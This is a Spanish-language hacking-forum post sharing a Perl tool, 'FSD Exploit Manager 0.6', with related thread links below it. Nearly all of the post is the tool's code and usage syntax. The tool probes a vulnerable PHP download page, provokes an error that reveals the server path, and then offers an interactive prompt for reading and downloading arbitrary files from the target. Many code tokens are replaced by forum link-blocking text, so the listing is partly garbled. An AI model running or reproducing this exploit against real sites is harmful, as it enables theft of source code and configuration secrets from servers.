send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] FSD Exploit Manager 0.6

  • 0 Respuestas
  • 1291 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 544
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Febrero 20, 2015, 01:27:42 pm »
Un simple script en Perl para explotar la vulnerabilidad Full Source Discloure solo ponen el link de la pagina vulnerable con el path y pueden bajar archivos de forma facil con este script.

El codigo :

Código: Perl
  1. #!usr/bin/perl
  2. #FSD Exploit Manager 0.6
  3. #(C) Doddy Hackman 2014
  4.  
  5. use Getopt::Long;
  6. use Color::Output;
  7. Color::Output::Init;
  8. use LWP::UserAgent;
  9. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  10. use File::Basename;
  11. use Cwd;
  12.  
  13. my $nave = LWP::UserAgent->new();
  14. $nave->agent( $agents[ You are not allowed to view links. Register or Login @agents ] );
  15. $nave->timeout(5);
  16.  
  17. installer();
  18.  
  19. GetOptions(
  20.     "scan=s" => \$scan,
  21.     "fpd"    => \$fpd,
  22.     "logs"   => \$logs,
  23.     "open"   => \$open
  24. );
  25.  
  26. head();
  27.  
  28. if ($scan) {
  29.  
  30.     my $page = $scan;
  31.  
  32.     printear("\n[+] Scanning target : ");
  33.     You are not allowed to view links. Register or Login $page. "\n\n";
  34.  
  35.     my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
  36.  
  37.     my $me = basename($path);
  38.  
  39.     $code1 = toma( $page . $me );
  40.     if ( $code1 =~ /header\((.*)Content-Disposition: attachment;/ig ) {
  41.         printear_titulo("[+] Vulnerable\n");
  42.         $code2 = toma( $page . "'" );
  43.         if (   $code2 =~ /No such file or directory in <b>(.*)<\/b> on line/
  44.             or $code2 =~
  45.             /No existe el fichero o el directorio in <b>(.*)<\/b> on line/ )
  46.         {
  47.             my $ruta    = $1;
  48.             my $cambiar = basename($ruta);
  49.             $ruta =~ s/$cambiar//;
  50.  
  51.             my $prompt = "";
  52.  
  53.             if ($fpd) {
  54.                 printear("\n[+] Full Path Dislocure Detect : ");
  55.                 You are not allowed to view links. Register or Login $ruta. "\n";
  56.                 $prompt = "[" . $ruta . "] > ";
  57.             }
  58.             else {
  59.                 $prompt = "[prompt] > ";
  60.             }
  61.  
  62.             unless ( -d $auth ) {
  63.                 You are not allowed to view links. Register or Login( $auth, "0777" );
  64.                 You are not allowed to view links. Register or Login 0777, $auth;
  65.             }
  66.             You are not allowed to view links. Register or Login($auth);
  67.  
  68.             printear("\n[+] File Downloader : ");
  69.             You are not allowed to view links. Register or Login "Ready\n";
  70.  
  71.             while (1) {
  72.                 $SIG{INT} = \&adios;
  73.                 printear_titulo( "\n" . $prompt );
  74.                 You are not allowed to view links. Register or Login( my $comando = <stdin> );
  75.                 if ( $comando =~ /!exit/ ) {
  76.                     adios();
  77.                 }
  78.                 elsif ( $comando =~ /!read_file (.*)/ ) {
  79.                     my $archivo = $1;
  80.                     my $code    = "";
  81.                     my $code    = toma( $page . $archivo );
  82.  
  83.                     printear_logo(
  84. "\n----------------------------------------------------\n"
  85.                     );
  86.                     printear_titulo($code);
  87.                     printear_logo(
  88. "\n----------------------------------------------------\n"
  89.                     );
  90.  
  91.                 }
  92.                 elsif ( $comando =~ /!download_file (.*)/ ) {
  93.                     my $archivo = $1;
  94.                     my $nombre  = basename($archivo);
  95.                     printear_titulo("\n[+] Downloading file : ");
  96.                     You are not allowed to view links. Register or Login $nombre. "\n";
  97.                     if ( $nave->mirror( $page . $archivo, $nombre ) ) {
  98.                         printear("\n[+] File Downloaded\n");
  99.                         if ($open) {
  100.                             my $abrir = getcwd() . "/" . $nombre;
  101.                             if ( -f $abrir ) {
  102.                                 abrir_archivo($abrir);
  103.                             }
  104.                             if ( !You are not allowed to view links. Register or Login($logs) ) {
  105.                                 if ( -f $abrir ) {
  106.                                     You are not allowed to view links. Register or Login($abrir);
  107.                                 }
  108.                             }
  109.                         }
  110.  
  111.                     }
  112.                     else {
  113.                         printear("\n[-] File not downloaded\n");
  114.                     }
  115.                 }
  116.                 elsif ( $comando =~ /!help/ ) {
  117.                     printear( "\n[+] Commands : " . "\n\n" );
  118.                     printear("!download_file <file> : Download file\n");
  119.                     printear("!read_file <file> : Read File\n");
  120.                     printear("!help : Show commands\n");
  121.                     printear("!exit : To exit the program\n");
  122.                 }
  123.                 else {
  124.                     printear("\n[-] Command not found , try using !help\n");
  125.                 }
  126.  
  127.             }
  128.  
  129.         }
  130.     }
  131.     else {
  132.         printear_titulo("[-] Not vulnerable\n");
  133.     }
  134. }
  135. else {
  136.     sintax();
  137. }
  138.  
  139. copyright();
  140.  
  141. sub abrir_archivo {
  142.     my $os = $^O;
  143.     if ( $os =~ /Win32/ig ) {
  144.         You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login(notepad.exe "$_[0]"));
  145.     }
  146.     else {
  147.         You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login(gedit '$_[0]'));
  148.     }
  149. }
  150.  
  151. sub printear {
  152.     cprint( "\x036" . $_[0] . "\x030" );
  153. }
  154.  
  155. sub printear_logo {
  156.     cprint( "\x037" . $_[0] . "\x030" );
  157. }
  158.  
  159. sub printear_titulo {
  160.     cprint( "\x0310" . $_[0] . "\x030" );
  161. }
  162.  
  163. sub sintax {
  164.     printear("\n[+] Sintax : ");
  165.     You are not allowed to view links. Register or Login "perl $0 <option> <value>\n";
  166.     printear("\n[+] Options : \n\n");
  167.     You are not allowed to view links. Register or Login "-scan <page> : FSD Exploit Scanner\n";
  168.     You are not allowed to view links. Register or Login "-fpd : Check Full Path Discloure\n";
  169.     You are not allowed to view links. Register or Login "-logs : Enable logs to save files downloaded\n";
  170.     You are not allowed to view links. Register or Login "-open : Enable open files downloaded\n";
  171.     printear("\n[+] Example : ");
  172.     You are not allowed to view links. Register or Login "perl fsd.pl -scan http://localhost/download.php?down= -fpd -logs\n";
  173.     copyright();
  174. }
  175.  
  176. sub installer {
  177.     unless ( -d "fsdlogs/" ) {
  178.         You are not allowed to view links. Register or Login( "fsdlogs/", "777" );
  179.         You are not allowed to view links. Register or Login 0777, "fsdlogs/";
  180.     }
  181.     You are not allowed to view links. Register or Login("fsdlogs");
  182. }
  183.  
  184. sub adios {
  185.     printear_titulo("\n\n[+] Good Bye\n");
  186.     copyright();
  187. }
  188.  
  189. sub head {
  190.     printear_logo("\n-- == FSD Exploit Manager 0.6 == --\n\n");
  191. }
  192.  
  193. sub copyright {
  194.     printear_logo("\n\n-- == (C) Doddy Hackman 2014 == --\n");
  195.     You are not allowed to view links. Register or Login(1);
  196. }
  197.  
  198. sub toma {
  199.     You are not allowed to view links. Register or Login $nave->get( $_[0] )->content;
  200. }
  201.  
  202. #The End ?
  203.  

Un video con ejemplos de uso :



Si quieren bajar el programa lo pueden hacer de aca :

You are not allowed to view links. Register or Login.
You are not allowed to view links. Register or Login.

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 2855
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1327
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Iframe DDos Attack Tool

Iniciado por BigBear

Respuestas: 0
Vistas: 1182
Último mensaje Julio 03, 2011, 10:06:45 pm
por BigBear
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 970
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Perl] Search in google for scan SQLI

Iniciado por BigBear

Respuestas: 0
Vistas: 1080
Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear